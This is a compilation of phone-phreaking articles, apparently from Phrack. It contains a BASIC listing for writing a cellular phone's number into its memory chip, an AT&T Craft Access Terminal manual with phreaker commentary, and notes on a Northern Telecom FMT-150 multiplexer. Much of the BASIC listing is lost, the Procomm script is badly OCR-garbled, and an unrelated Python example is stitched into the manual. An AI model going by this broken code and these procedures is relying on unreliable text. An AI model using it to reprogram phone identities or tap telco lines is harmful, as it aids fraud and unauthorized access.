[The listing from here to line 2200 is garbled beyond recovery in this 
copy. From the legible fragments it splits the MIN into area code, prefix 
and line number (MID$(PHONE$,1,3), MID$(PHONE$,4,3), MID$(PHONE$,7,4)), 
encodes them into the NAM, stores CHECK AND 255 as the checksum byte, sets 
the parallel port base address near line 1950 (the value given is for LPT2; 
&h378 is LPT1 and &h3bc is LPT3), and drives the chip through subroutine 
1970, which writes the data, clock and relay bits out of the port, waits a 
short delay loop and reads the acknowledge bit back in. Subroutine 2010 
shifts the bit string B$ out one bit per clock, and the program stops with 
"Bus not free error" or "Nack timeout error" when the bus or the chip does 
not respond.] 


2210 GOSUB 2010                    ' Device address byte
2220 B$=""
2230 FOR I=7 TO 0 STEP -1          ' Word address J as a bit string
2240 IF (J AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
2250 NEXT
2260 GOSUB 2010
2270 Z=BYTE(J)
2280 B$="":FOR I=7 TO 0 STEP -1    ' Data byte as a bit string
2290 IF (Z AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
2300 NEXT
2310 GOSUB 2010
2320 DOUT=0:CLK=0:GOSUB 1970
2330 DOUT=0:CLK=1:GOSUB 1970       ' Stop bit
2340 DOUT=1:CLK=1:GOSUB 1970
2350 PRINT USING "###% programmed"; 100*J/MAX
2360 PRINT STRING$(80*J/MAX, 46)
2370 LOCATE CSRLIN-2, POS(0)
2380 GOSUB 1970
2390 IF DIN=0 GOTO 2380            ' Wait for the chip to finish the write
2400 NEXT
2410 RELAY=0:DOUT=1:CLK=1:GOSUB 1970
2420 PRINT:PRINT
2430 ' This is the end in case you thought the code was truncated somehow...
==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 8 of 18 


Written by Boss Hogg 


Greets: Voyager/Splatter/Mr.Hyde/Misfit/Darkseed/] [avok/Paradyne 
Ethereal Gloom/Surgat/GOL/Carnage/Kamakize/Seeker/Stravis 
+ all others with weird thoughts and ideas. 


The craft. 


Although it’s called a Craft Access Terminal, the craft hardly 
represents a standard computer terminal. It is actually a lineman’s 
handset with a built in terminal and 1200 baud modem. The unit looks 
like a handset on steroids measuring 12.5" in length. The ones in our 
particular area were bright yellow and look like a rejected Sesame 
Street prop. We have reports that they also made them in a blue color as 
well though we have yet to see one in use in our area. 

The unit features a 4 line x 16 character LCD display, and a 
joystick with a plunger on the top. You will find a diagram of the unit 
with descriptions in brackets. 

These units are possibly being phased out in a few areas and 
have been found at telco auctions as well as from surplus stores. They 
could be replacing these yellow units with the blue units (which have 
the same basic descriptions yet are newer. The crafts we have found were 
severely worn). We have also heard they were being replaced with an 
Access-2 terminal (rumored to represent a HP-951x palmtop; fold open, 
larger LCD screen). 

This is essentially the entire uncopyrighted manual to the 
terminal. The unit can be somewhat confusing at first due to a somewhat 
weird menu layout. 

Also, to avoid confusion: 

The page numbers are located at the bottom of the pages. You may wish 
to add pagefeeds and space out the page numbers to the bottom of the 
page if you want to print it out and stick it in your phreakers binder 
or whatever.... The line is meant for the top of each page... As there 
is a line at the top in the real manual. 


----Here begins the Craft Access Terminal Instruction Manual---- 

AT&T 

Craft Access Terminal 

Instruction Manual 

-cover- 

Table of Contents                                Page 
Features                                            2 
Using the pointer                                   4 
Battery Pack                                        6 
Connecting to a working pair                        8 
Making a telephone call                             9 
Calling a computer 
Working with a computer 
Getting help                                       15 
Making or canceling a selection on a screen        17 
Reading stored information                         19 
Filling in information                             20 
Taking care of your terminal                       25 


Getting Started 


Two battery packs, a charger and a short charger adaptor cord 
should be in the box with the Craft Access Terminal. Before 
using the Craft Access Terminal, insert a battery pack. The 
battery pack must be charged before use. For directions on how 
to charge and insert the battery pack, look at the section of 
the instructions called "The Craft Access Terminal’s Battery 
Pack." This section begins on page 6. 
Craft Access Terminal Features 

Receiver - Works like any ordinary telephone receiver. 
[points to ear-piece] 

Transmitter - Works like an ordinary telephone transmitter. 
[points to mouthpiece] 

Craft Access Terminal - Identification Number 
[points to sticker underneath the TRANSMITTER] 

Phone Jack - A modular telephone cord can be plugged in here. 
[located on bottom of the handset] 

Recharger Jack - The plug on the recharger cord is inserted into 
the jack. 
[located on bottom of the handset] 

Connecting Cord - Connects to a working pair to get dial tone for 
making a call to either a telephone or a computer. 
[extends from bottom of handset] 

Screen - A liquid crystal display shows information 
or instructions. 
[on top-front of handset. c’mon- you cant miss it!] 

Mode Switch 
Three positions: 

Talk    - make a phone call 
Monitor - listen for conversation 
Data    - make a computer call 

Moving the switch to monitor will disconnect a call. 
[This switch is located on the right-top side, when the ] 
[LCD screen is facing you ] 

Pointer - Used to mark and select actions on the screen and to 
indicate where you want to enter information. 
[Joystick located under Screen] 

Rechargeable Battery Pack - Provides power for the terminal. The 
pack must be recharged every day. 

[This is accessed by removing a cover held in place by a normal ] 
[phillips screw. The compartment is located under the pointer. ] 
[NOTE: Although there is a 9-volt battery snap, the thing only ] 
[uses 4 1.2volt nicads... 4 AA batteries work fine... For those ] 
[whose sets didn’t come with battery packs ] 

Alpha Numeric Keypad - Used to enter letters and numbers on the 
screen. 
[Uhh- A normal Touch Tone pad... Cant miss it ] 


Using the pointer 


[Diagram: the joystick, with BACK at the top center, REVIEW at the 
bottom center, the HELP (?) positions down the left side and the 
SELECT (>) positions down the right side.] 

The pointer allows you to make choices from a 
screen, show where you want to fill in information, 
read information that is temporarily stored for you 
in the Craft Access Terminal, and get an 
explanation about a screen. 

Remember that you must push the pointer to 
make a choice. 

The pointer can be moved along the right side, 
along the left side, to the top center and bottom 
center position. 


If you want to select from two or more choices on the 
screen, move the Pointer along the right side until 
the arrow (>) appears next to the line you want to 
select and then press the Pointer. 


If you want additional information about one of the 
choices on the screen, move the Pointer along the 
left side until the question mark (?) appears next to 
the line where you need HELP and then press the 
Pointer. 


If you want to go BACK one screen, move the Pointer 
to the top center position and then press the 
Pointer. 


If you want to REVIEW information stored in your 
Craft Access Terminal, move the Pointer to the bottom 
center position and then press the Pointer. 


-5- 




The Craft Access Terminal’s Battery Pack 


You must charge the terminals battery pack at least once every 
day. It may take up to twelve hours for a full charge if the 
battery pack has run down completely. Also, before the first 
use, each battery pack should be charged for 24 hours. 


To do this, insert the plug at the other end of the cord 
attached to the charger into the socket at the transmitter end 
of the Craft Access Terminal. Plug the charger at the end of 
the cord into an electrical outlet. The red light on the 
charger should be lit if it is charging properly. However, the 
light will not go out if the battery is fully charged. It is 
advisable to keep the extra battery pack charged so you can 
use it if the battery pack in the terminal you’re using runs 
down. To charge the spare battery pack, plug the charger 
adapter cord, (the short cord included with the charger) into 
the pack. Plug the other end of the adapter cord into the 
charger, and plug the charger into an electrical outlet. 


CAUTION 


The charger should only be used indoors and only for charging 
Craft Access Terminal. 


If the battery pack runs out of power while you are using the 
terminal, the pack can be removed and the charged pack can be 
inserted. To do this, follow these steps: 


1. Open the Battery Pack Compartment 
Loosen the screw to open the battery cover. Do not hold 
down battery compartment cover while loosening the 
screw. 


2. Remove the Battery Pack 
Lift out battery pack. Unsnap the battery pack from the 
connector. 


-6- 


3. Insert the Battery Pack 
Snap the charged battery pack into the connector. 
Slide the battery pack into the Craft Access Terminal. 
Close the battery cover. Don’t forget to tighten 
the screw. 


How Long Will the Craft Access Terminal Stay Charged? 


At normal temperatures, the Craft Access Terminal will 
operate for approximately 12 hours after being charged. 


The Craft Access Terminal can be used in warm or cold 
temperatures. You should keep in mind however, that the 
battery pack will be drained faster in cold weather. At -20 
degrees Fahrenheit, it may last only 8-10 hours. 


The battery pack in the Craft Access Terminal should not be 
charged at temperatures less than 40 degrees Fahrenheit. 


Battery Pack Life 


The battery pack can be charged many times, providing a 
working life of about 5 years. The four digit number stamped 
on the end of the battery is its date of manufacture. 


Connecting to a Working Pair 


Monitor the Line 
Before connecting to a pair, set the switch at the Monitor 
(center) position. 


Connect Cord and Clips 

Attach cord clips to tip and ring. If you hear a conversation, 
select another pair. You should hear dial tone when connected 
to an available working pair. 


* Connect at a standard terminal point whenever possible to avoid 
puncturing the insulation; holes made in insulation by clips 
can lead to later corrosion problems 


Alternately, dial tone can also be obtained by inserting a 
modular cord as shown on page 2. Do not insert line cord to 
modular jack and connect to tip and ring at the same time. It 
will not work. 


Move back to monitor to increase or decrease volume. To 
increase the volume, move the Pointer along the right side 
until the arrow (>) is next to "increase volume" and then 
press the Pointer. 


To decrease the volume, point to the third line, and press. 


If you want to use the terminal to listen for noise on the 
line, point to the second line and press. This puts the 
terminal in the "quiet" mode so that very low levels of noise 
can be detected. 


Notice that the top line on this screen can’t be selected. To 
indicate this, the first space on the line contains a bar. 
(|). 


You can now make an ordinary telephone call by moving the 
switch to Talk (see Making a Telephone Call) or call a 
computer by moving the switch to Data (see Calling a 
Computer). 
Making a Telephone Call 


Move the switch from Monitor to Talk Position 


Monitor the line to be sure it isn’t in use. If no one is 
talking on the line, move the switch from Monitor to Talk. 


Telephone Number Entry and Correction 


If the line is good, you will hear a dial tone. You can enter 
the number you want to call through the keypad. If a number is 
already filled in, you can call that number, or, if you want 
to call a different number, erase the number that is on the 
screen by pressing * on the Touch-tone pad, and enter another 
number. 


* If the (*) is entered as the first character, it will not 
erase unless another (*) is entered. 


The small flashing bar is called the cursor. The cursor will 
appear where a number must be entered. 


As each digit to the telephone number is filled in, it will 
appear where the cursor was, and the cursor will move one 
space to the right. Enter a pound (#) between digits to 
indicate a 2-second pause in dialing where required (to wait 
for a second dial tone behind a PBX number, for example). For 
a longer pause, press pound (#) several times. 


When the correct phone number is shown, move the Pointer to the 
right side (anywhere along the right side will do) and press. 
If you need to rotary dial, select the last line with the 
Pointer before you press. The Craft Access Terminal will dial 
the number. You can re-dial by moving the Pointer to the right 
side and pressing again. 


The Craft Access Terminal will save the telephone number and it 
will appear the next time the switch is moved to the Talk 
position. 


You can listen as the Craft Access Terminal dials the number. 
If you hear a busy signal after dialing is completed, or if no 
one answers the call, disconnect by moving the switch to the 
Monitor position. 


Call in Progress and Volume Control 


When dialing is completed, this screen appears. Use the 
Pointer to increase or decrease the volume of the receiver, 
or to mute the transmitter to listen only. 


The volume level is indicated by the number of filled spaces on 
the increase volume line. One filled space for minimum volume, 
four for maximum. 




Disconnecting 


Moving the switch to the Monitor position will end the phone 
call, and this screen will appear. 


Be sure to move the switch to the Monitor position after 
disconnecting. This will conserve battery power as the 
terminal drains the least amount of power in the monitor mode. 


If you are accidentally disconnected, move the switch to the 
Monitor position and start again. 




Calling the Craft Access System Computer 


Move the Switch from Monitor to Data Position. 


Monitor the line to be sure it isn’t in use. If no one is 
talking on the line, move the switch from Monitor to Data. 


Telephone Number Entry and Correction 


You can enter the number you want to call through the keypad. 
If a number is already filled in, you can call that number, 
or, if you want to call a different number, erase the number 
on screen by pressing the asterisk (*) on the Touch-tone pad, 
and fill in another number. 


The cursor will appear where a number must be entered. 


Fill in the computer’s telephone number if it isn’t already 
shown. Put a pound (#) between digits to indicate a 2-second 
pause in dialing where required (to wait for a second dial 
tone behind a PBX number, for example). For a longer pause, 
press pound (#) several times. 


When the correct phone number is shown, move the Pointer to 
the right side (anywhere along the right side will do) and 
press. The Craft Access Terminal will dial the number. You 
can re-dial by moving the Pointer to the right side and 
pressing again. 


Indications that the Call is Successful 

If the call to the Craft Access System computer is successful, 
you will hear a tone on the line. When the Craft Access 
Terminal detects that tone, the tone will stop and a screen 
like this will appear. 


In some cases the call may not be successful. If you retry a 
few times and still have difficulty, try connecting your cord 
to another working pair. 


Password Entry 


Before you send or receive any computer information, you may 
need to fill in a numeric password to identify yourself and a 
number to identify your terminal. Your password can be used 
only with your Craft Access Terminal. Fill in your password 
on the keypad. If you make a mistake press the asterisk (*) 
to erase the password and start over. The cursor will return 
to the place where the password must be filled in. 


The Terminal Identification number is located below the 
transmitter (see page 2). 


When the correct numbers are filled in, move the Pointer to 
the right side (anywhere along the right side will do) and 
press. The Craft Access Terminal will send your password to 
the computer. 




See "Working with the Craft Access System Computer" for further 
instructions about what to do next. 


Disconnect 


If your call to a computer is accidentally disconnected, move 
the switch to the Monitor position and repeat from the first 
step to re-dial. 


If you want to disconnect, move the switch to Monitor and this 
screen will appear. 




Working with the Craft Access System Computer 


Each line on a screen is either: 

- information 

- a space in which information can be filled in 

- a choice that can be selected 


This screen is an example. Information can be read on the first 
line, a number is to be entered on the second line, and you 
can make a choice between the last two lines. Lines that don’t 
contain selectable choices begin with a bar (|). Those that 
are selectable choices begin with a blank space. 


Getting Help 


To get help about the third line of this screen, move the 
Pointer along the left side until a question mark appears 
beside the third line. When the question mark is beside the 
line, press the Pointer. The help that appears describes what 
will happen if you select choice 1. 


To get help about the second line of this screen, a line in 
which information can be filled in, move the Pointer along the 
left side until a question mark (?) appears in the space where 
information is to be filled in and then press. 




This is an example of an explanation. A bar (|) appears to the 
left of every line and there is a page number in the top right 
corner of the screen. This page is numbered 1/2, indicating 
that it is the first page of two pages of information. The 
second page will be numbered 2/2. 


To read the next page of Help, move the Pointer to the right 
side (anywhere along the right side will do) and press. 
If you want to re-read pages, point to REVIEW (move the Pointer 
to the bottom center position and press) to go back one page 
at a time. 


When you are ready to go back to the screen where you 
originally requested help, point to BACK (move the Pointer to 
the top center and press). 




Making or Canceling a Selection on a Screen 


Making a Selection 


When a screen that contains selectable choices is shown, move 
the Pointer along the right side until the arrow (>) is 
beside the choice you want. Then press the Pointer to make 
the selection. 


Some choices make requests of a computer that may take a while. 
If so, a "request in progress" message such as this will 
appear. 




Canceling a Selection 


If at this point you realize that you’ve made a wrong choice, 
point to BACK (move the Pointer to the top center and press). 
The screen on which you made the choice will be shown and you 
can make a different choice. 


Some requests cannot be canceled. In this case, only "request 
in progress" is displayed. 


Reading Information Stored in the Craft Access Terminal 


Some of the information sent to you from the computer may be 
stored in the Craft Access Terminal in case you need it again 
later, even if your terminal is disconnected, as long as its 
battery pack is charged. If you want to see stored 
information, move the switch to either Monitor or Voice and 
point to REVIEW (move the Pointer to the bottom center and 
press). 


A list containing the major categories of information currently 
stored in your Craft Access Terminal will appear on the 
screen. To select a category, move the Pointer along the right 
side until the arrow (>) is beside the category that you want 
to select and then press the Pointer. 

Sometimes an item that you have selected leads to another list. 


Make a selection from this list in the same way you did on the 
previous list. To quit reading, point to BACK (move the 
Pointer to the top center and press). To reread pages of 
stored information, point to REVIEW (move the Pointer to the 
bottom center position) and then press the Pointer. 


Filling in Information on the Craft Access Terminal 


If a screen contains a space where a number can be filled in, 
the cursor will be blinking at the space. If there is already 
a number in the space you may want to change it. If you decide 
to use the number that is already shown, point to NEXT (move 
the Pointer to any position on the right side and press). 


If you want to change the number, press the asterisk (*) to 
erase the wrong number, then fill in the number you want. 


When the desired number is shown, point to NEXT (move the 
Pointer to any position on the right side and press). 


Sometimes you may need to return to a screen to correct an 
entry. 


When you point to BACK (move the Pointer to the top center and 
press), the cursor will appear at the beginning of the first 
place where information was filled in. 


Press the asterisk (*) on the keypad to erase the entered 
number, or make a correction by typing over the incorrect 
number with the correct number. 




If there are several spaces to be filled in on one screen, move 
the Pointer along the right side of the control to point to 
each location where you can enter information. Don’t press the 
Pointer until you have filled in all the required information. 


If a space where information can be filled in is preceded with 
an asterisk (*), the information is optional and the space may 
be left without an entry. 


After you have filled in all of the information you need, point 
to NEXT (move the Pointer to any position on the right side 
and press). 


Display of the asterisk is actually controlled by the Craft 
Access System computer. Keep in mind that this can change. 


Entering Alphabetical and Numerical Characters 


Sometimes the Craft Access System will allow you to enter 
letters and punctuation marks to fill in the information that 
is needed. Whenever this is the case, this screen is 
displayed. 


Letters, numbers and punctuation marks are entered from the 
keypad. All characters you enter appear on the screen. 


Each key is used to enter four different characters as labeled 
on the key; except for the [#] key. The [SP] on the [#] key is 
used to enter a space between two words. 


Two easy methods can be used to enter characters: 


- Method 1: Press and hold down the key with the desired 
character. Look at the display while holding down the key. 
You will see each character labeled on that key appear one 
after the other. When the desired character appears, release 
the key and that character will remain on the screen, and the 
cursor will advance to the next position. 


- Method 2: There is no need to continuously watch the screen 
with this method. Instead of holding down the key you rapidly 
tap the key a number of times equal to the position of the 
desired character on that key. 


For example, tap the [6] key three times to enter [N]; tap 
the [3] key three times to enter [E]; tap the [9] key twice 
to enter [W] and tap the [#] key twice to enter a space. 


A blinking dark block on the screen indicates you have entered 
your last character. 
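

As an added illustration that is not part of the manual, the 
following Python models Method 2 above: it maps (key, tap count) 
pairs to the characters the terminal would show and back again. 
The keypad layout beyond the manual's own examples is an assumption 
noted in the code. 

```python
# Added example, not from the Craft Access Terminal manual: a model of
# the terminal's "Method 2" alpha entry, in which tapping a key N times
# enters the N-th character printed on it.  The layout follows the
# manual's own examples ([6] x3 = N, [3] x3 = E, [9] x2 = W, [#] x2 =
# space), i.e. each digit key carries its digit first and then three
# letters.  The letter groups on the other keys, and the absence of Q
# and Z, are an assumption based on telephone keypads of that period.
from typing import List, Tuple

KEY_CHARS = {
    "2": "2ABC", "3": "3DEF", "4": "4GHI", "5": "5JKL",
    "6": "6MNO", "7": "7PRS", "8": "8TUV", "9": "9WXY",
    "#": "# ",   # the [SP] label on the [#] key enters a space
}

Tap = Tuple[str, int]   # (key, number of rapid taps)


def decode_taps(taps: List[Tap]) -> str:
    """Text the terminal would show for a sequence of (key, taps) pairs."""
    text = []
    for key, count in taps:
        if key not in KEY_CHARS:
            raise ValueError(f"{key!r} is not an alpha-entry key")
        chars = KEY_CHARS[key]
        if not 1 <= count <= len(chars):
            raise ValueError(f"key {key} carries {len(chars)} characters, "
                             f"so {count} taps selects nothing")
        text.append(chars[count - 1])
    return "".join(text)


def encode_text(text: str) -> List[Tap]:
    """Tap sequence that enters `text` (letters are upper-cased first)."""
    taps: List[Tap] = []
    for ch in text.upper():
        for key, chars in KEY_CHARS.items():
            if ch in chars:
                taps.append((key, chars.index(ch) + 1))
                break
        else:
            raise ValueError(f"{ch!r} cannot be entered from this keypad")
    return taps


if __name__ == "__main__":
    manual_example = [("6", 3), ("3", 3), ("9", 2), ("#", 2)]
    print(repr(decode_taps(manual_example)))   # the manual's "NEW " example
    print(encode_text("ALBNMN"))
```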


Erasing a Character, an Entire Line or More 


If you want to erase a character, push the pointer to the left 
and press once. If you hold the pointer down, it will continue to 
erase characters one at a time until it is released. 


Sending Your Message to the Computer 


When you are through entering the message, move the pointer to 
the right and press it to send your message. The cursor should 
stop blinking to indicate that your message has been sent. 




Taking Care of Your Terminal 


1. To avoid damaging the Craft Access Terminal: 


- Don’t drop the terminal. During the work day, the Craft 
Access Terminal should be in the cab of your vehicle or 
clipped to your tool belt when not in use. 


- Don’t unnecessarily expose the terminal to dust, sand, 
water, or salt air. 


2. Problems Caused by Extreme Temperatures 


Heat 


The Craft Access Terminal can be damaged by extreme heat. 
DON’T LEAVE IT ON THE DASH OF YOUR VEHICLE. 


Cold 


Cold is less likely to damage the terminal. However, the 
screen won’t work properly at temperatures less than -20 
degrees Fahrenheit. If you must use your terminal in colder 
temperatures, you can use it for about 20 minutes in the 
cold, then place it somewhere warm for 15 to 30 minutes and 
then use it in the cold again. 


3. Problems Caused by Water, Condensation, and High Humidity. 


Don’t expose the terminal to water; especially avoid dropping 
the terminal in water. If it does get wet, dry it immediately. 
The Craft Access Terminal will work in rain or snow, but 
should be wiped dry whenever possible. 


4. How to store the Craft Access Terminal and spare batteries. 


When not in use, the Craft Access Terminal or spare battery 
pack should be connected to the charger. 


5. Under some abnormal conditions, the terminal may lock itself 
into an incorrect state. To "reset" the terminal, simply 
insert the battery charger plug into the charge jack, then 
remove it. CAUTION: This will erase any stored information. 




For Quick Reference: 


[Diagram of the Pointer (joystick) positions; the labels read:] 


BACK (top center) 
-To go back to a screen you saw previously 
-To quit reading stored information 


NEXT (right side) 
-To select a choice 
-To read new page of help or new page of stored information 
-To send mail 


REVIEW (bottom center) 
-To read information stored in the Craft Access Terminal 
-To read previous page of help or stored information 


LEFT SIDE 
-To get an explanation of selectable items 
-To erase a character or line (alpha-entry mode only) 
FCC Regulations for Telephone Equipment 
(you know all this crap) 


(BACK COVER) 




(END) 


A few last notes: 


The real Craft handsets do not have a power switch, they just 
sit on all of the time. So we could also add a power switch to 
ours. 


The Craft handset uses a 1200 baud modem, but seems to be 
incompatible with standard modems... 
Information about Northern Telecom’s FMT-150B/C/D 
Written by StaTic 
(statik@free.org) 


Ok, I know someone wrote an article in Phrack about the 
FMT-150B/C/D, but I figured I should write some more. I am not 
going to write the same info that FyberLyte wrote, in fact I 
recommend you go and check it out. It is in Phrack #44-13. This 
is some stuff I obtained, that I figured the rest of the world 
would be interested in. 


Included info: 


Connecting a FMT-150 to a Rockwell OS-35 
Environmental Alarms to the FMT-150 
Procomm Script to Perform Configuration of FMT-150 
FMT-150 Configuration Checklist 
Glossary of Terms 


INSTRUCTIONS FOR X-CONNECTING FMT-150 CUSTOMER OUTPUT TO 
ROCKWELL OS-35 INPUTS 


A pin block will be provided at the central office location, in 
the bay equipped with FMT-150 equipment. The pin block will 
provide the termination points for the Rockwell OS-35A and the 
FMT-150 customer output alarms. Each pin block will be able to 
support a maximum of 16 FMT-150 systems, see pin block diagram. 


Wiring of the FMT-150 customer outputs will be done by the vendor 
on the back of the pin block. Once a FMT-150 system has been 
certified, the certification team will be responsible for 
x-connecting the FMT-150 customer output alarm points to the 
appropriate OS-35A points on the front of the pin block. 
Completion of this x-connecting will allow FMT-150 system alarms 
originating either from the CO or the RT to be transported via 
the OS-35A back to the Lightwave and Radio Alarm Center. 


IMPORTANT, MBT CERTIFICATION TEAMS X-CONNECT ONLY THE FMT-150 
THAT IS BEING PUT INTO SERVICE AND ONLY AFTER THE ELECTRONICS 
ARE CERTIFIED. 


[Pin block diagram: FMT-150 customer OUTPUT 1-16 to OS-35A 
inputs; only the labels MAJOR, ALARM #1 and ALARM #2 are 
legible.] 


The FMT-150 16 customer outputs are defined as follows (only 
part of the table is legible): 


DS1 GRP FAIL 
SYSTEM ID CLLI 
COMM. EQUIP. ALARM 
NODE #1 CO 
NODE #2 REMOTE 


The Rockwell OS-35A provides a total of 32 separate alarm points. 
The first 16 points with the exception of point 13 have been 
multiplied on the pin block to provide x-connect points for a total 
of 16 FMT-150 systems, see pin block diagram. 


On the pin block x-connect the designated (1 of 16) FMT-150 system 
customer outputs, pins 1-12 and 14-16 to the appropriate OS-35A 
pins 1-12 and 14-16, see pin block diagram. 


Pins 17-32 on the pin block going to the OS-35A will be used for 
x-connecting the customer output #13 from each FMT-150 system. 
Customer output #13 provides the system ID for the FMT-150, see pin 
block diagram. 


X-CONNECT CUSTOMER OUTPUT #13 FROM FMT-150 SYSTEMS IN 
THIS SEQUENCE 


OS-35A      FMT-150 System 
PIN 17      SYSTEM 1 
PIN 18      SYSTEM 2 
  ...         ... 
PIN 31      SYSTEM 15 
PIN 32      SYSTEM 16 


AGAIN, WIRE ONLY THE FMT-150 SYSTEM THAT IS BEING PUT INTO SERVICE 
AND ONLY AFTER CERTIFICATION OF ELECTRONICS HAS BEEN COMPLETED. 


After x-connects have been completed on an FMT-150 system that has 
been certified, contact the Alarm Center at (313) 223-9688 and 
verify that all 16 customer output alarm conditions at both the CO 
and RT can be activated and are reporting via the OS-35A back to 
the alarm center. 


The Lightwave Alarm Center will monitor the FMT-150 system for a 24 
hour quiet period for alarms. During this 24 hour period if no 
alarms are detected by the Lightwave Alarm Center, the FMT-150 will 
be considered certified for alarming and ready for continual 
monitoring. 


If during the 24 hour quiet period the alarm center receives alarms 
from the FMT-150 system, it will not be certified for continual 
monitoring and it will be the responsibility of the MBT 
Certification Teams to resolve those alarms. 


INSTRUCTIONS FOR CROSS CONNECTING ENVIRONMENTAL ALARMS TO 
THE FMT-150 INPUTS. 


Environmental alarms at remote locations may be connected to the 
FMT-150 customer inputs. If more than one system exists, these 
alarms should only be connected to the first. Since many remotes 
will not be equipped with all of these alarms, a checklist has been 
provided on the system acceptance sheets to indicate which have 
been wired. The alarms provided for are Smoke Detector, Sump Pump, 
Open Door, AC Power Fail, HI-LO Temperature, Rectifier Fail, and 
Battery Float. These are wired to pins D8 through E9 on the 
FMT-150 backplane. See Shelf Backplane Detail, attached. 


All Customer Inputs are software connected to Customer Output #12. 
They will also bring in Bay Minor (Output #1) or Bay Major (Output 
#2) as appropriate. Inputs #1 (Smoke Detector) and #2 (Sump Pump) 
are latching inputs that can only be cleared by accessing the MCU 
with a VT100 terminal. See Section 321-3211-01, DP 3003, page 2. 


FMT-150 systems using external inputs for environmental alarms and 
which use E2 telemetry rather than the OS-35 MUST be provided with 
type NT7H90XH Maintenance Control Units at both ends. 


External alarm operation and telemetry, if equipped, should be 
verified with the Alarm Center during acceptance. 
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Procomm Script for Accessing FMT-150B/C/D 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KKK K 


7* * 
1’ 

es FMT150.CMD Version 5.00 Dec 18, 1990 ES 
He Please Destroy all previous versions of this program! * 
o* * 
1, 

iy NOTE: Procomm is a product of Datastorm Technologies s 
A, ROR AIRE RIK NORRIE R IRR ROR ARIE RIK IRR RRR RR RR KR IK BRR RIS LINK RRR TEI RK TRUER RIA IR RRR AE 
’ 

; The script FMT150.CMD was written to automatically perform 

' all configuration commands for the Northern Telecom FMT-150 

7 fiber optic multiplexer. Specifically, this script will 

; complete over 125 configuration commands (performance 

: threshold, error correction, and alarm outputs) as outlined 

7 in Section 4 of the Michigan Bell Certification Procedure for 

; the FMT-150. This program is compatible with all 

+ certification requirements for FMT-150 MCU NT7H90XA or MCU 

; NT7H9OXE. 

7 

: Requirements: 

7 1) Toshiba T1000 craft terminal or DOS equivalent. 

7 2) Proper serial cables and adapters. 

- 3) Procomm disk with FMT150.CMD file. 

a 

Procedure for use: 

; 1) Remove disk from drive, then turn on computer. When the DOS 

7 prompt appears insert the PROCOMM disk into disk drive. 

; Enter the command "A:" + <ENTER>. 

: 2) Enter the command "FIXPRN" + <ENTER>. 

: 3) Enter the command "PROCOMM" + <ENTER>. 

; 4) While holding the <ALT> key down, press the <D> key, 

; and select FMT-150 from the dialing menu. 

F 5) Gain access to MCU as normal (press the <ENTER> key 3 times). 
; 6) Once logged in, reset the MCU to factory default by 

. entering "M"(aintenance) "R"(eset) "*"(all) + <ENTER>. 

HB It will take approximately three minutes to reconfigure. 

; 7) Gain access to MCU again as in steps 3) & 4). 

7 8) Select the script by pressing <ALT><F5> keys simultaneously. 

- 9) When prompted for command file enter "FMT150" + <ENTER>. 

; 10) Answer questions and away you go! 


; HISTORY: Version 4.00 May 15, 1990 by AQW final release version 

; HISTORY: Version 4.10 Aug 08, 1990 by JBH mod to use VPRINT to divert 
: printer into a better bit bucket, and to correct callback #. 
; HISTORY: Version 4.12 Nov 21, 1990 by EEE to use Customer Inputs 

; HISTORY: Version 5.00 Dec 18, 1990 by JBH to update documentation 
N051690000 


Dn 


D> 
¢ 
n 
Sw 
AAA eee 


" KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKW 


*wW 


FMT-150 MCU NT7H90XC\CA CONFIGURATION PROGRAM *" 
MCU NT7H90XE\EA CONFIGURATION PROGRAM *" 


*wW 


EC 18, 1990 ay 
*W 
MICHIGAN BELL TELEPHONE COMPANY a 

A DIVISION OF AMERITECH x 


*W 


VERSION 5.00 


O 


Se ees eee es sb Gs 
DC C1] CF DC C1] CF DC C1] C et aE 

n 

n 

> 

Q 


+ + + + + FF F F F 


7] 

n 

n 

> 

Q 
THe 


7 VARIABLE DOCUMENTATION 
;SQ=CLLI A USER INPUT 
;S1=CLLI B USE 


1, 


’ 


DUE EE EE © 


.txt 


ESSAGI 
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* 


[7] 


AUSE 
LARM 


3 
1 


S2=CL 


R INPUT 


I LOCAL USER INPUT 


I 
S3=YEAR 2 DIGIT USER INPUT 
;S4=MONTH 2 DIGIT USE 


R INPUT 


*W 


ESSAGE " KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKKKAKW 
ESSAGE " " 
ESSAGE " " 
ESSAGE " ....TO EXIT THIS PROGRAM AT ANY TIME, PRESS <ESC>...." 


;S5=DAY 2 DIGIT USER INPUT 
;S6=HOUR 2 DIGIT USER INPUT 
;S7=MINUTE 2 DIGIT USER INPUT 
;S8=SYSTEM ID & USER 
;S9=SYSTEM NUMBER 

LABEL1: 

7; note 


RESPONSE USED TO CONTROL PROGRAM FLOW 


the following statement was superseded in version 4.10 by VPRINT 


MODE LPT1:=COM2:" ; REQUIRED TO TURN PRINTER ERROR OFF 


E "Enter CLLI code for LOCATION A (C.O.) using full 8 or 11 characters:" 


E "Enter CLLI code for LOCATION B (REMOTE) using full 8 or 11 characters:" 


"Enter CLLI code for YOUR location using full 8 or 11 characters:" 


‘MI’, for example ALBNMN-JCSNMN." 


E "Enter system number, for example 1201 / T3x." 


ENT 


ER> W 


“DOS?” 

; following flushes the "RUB" buffer 
TRANSMET.."“*HOHSHSHSHAHA AS ASSAYS AAS aA Asana 
CLEAR 

LOCATE 10,2 

MESSAG 

LOCATE 12,2 

GET SO 11 ;CLLI A 

M ES SAGE W W 

CLEAR 

LOCATE 10,2 

MESSAG 

OCATE 12,2 

GET S1 11 ;CLLI B 

MESSAGE W W 

CLEAR 

OCATE 10,2 

MESSAGE ' 

OCATE 12,2 

GET S2 11 

CLEAR 

,OCATE 8,2 
MESSAGE "Enter system ID without 
LOCATE 10,2 

GET S8 13 

,OCATE 13,2 
MESSAG 

,OCATE 15,2 

GET S9 15 

TRANSMIT "CGNS" 

TT RANSMIT WNW 

TRANSMIT S8 

TRANSMIT "*‘"" 

TRANSMIT "!" 
CLEAR 

LOCATE 6,2 
MESSAGE "Enter today’s date." 
OCATE 8,2 
MESSAGE "Enter two digit year + < 
LOCATE 8,34 
GET S3 2 ; 2 DIGIT YEAR 
LOCATE 10,2 
